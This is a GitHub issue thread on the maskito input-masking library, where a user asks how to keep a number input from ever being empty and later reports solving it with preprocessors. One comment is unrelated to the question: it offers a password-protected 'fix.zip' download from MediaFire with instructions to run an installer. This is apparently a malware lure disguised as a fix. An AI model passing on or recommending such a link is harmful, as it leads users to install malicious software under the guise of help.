### ISSUE TITLE
Is there a build in way to disallow empty values for numbers?

### ISSUE THREAD

**Issue by movedoa** [taiga-family/maskito#1512]
I have a number input that should never be empty.

For example, if i have a value of "1,100" and i delete the first character before the decimal seperator i get ",100", but i want "0,100".
If i then delete the 1 after the decimal seperator i get "0,000"
If i then set the cursor before the first char and press delete i get "" but i want "0,000".

I assume this is possible with pre/post processors but before diving into that, i want to make sure there is no built in way to do this.

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by movedoa** [comment]
Found a working solutin with preprocessors
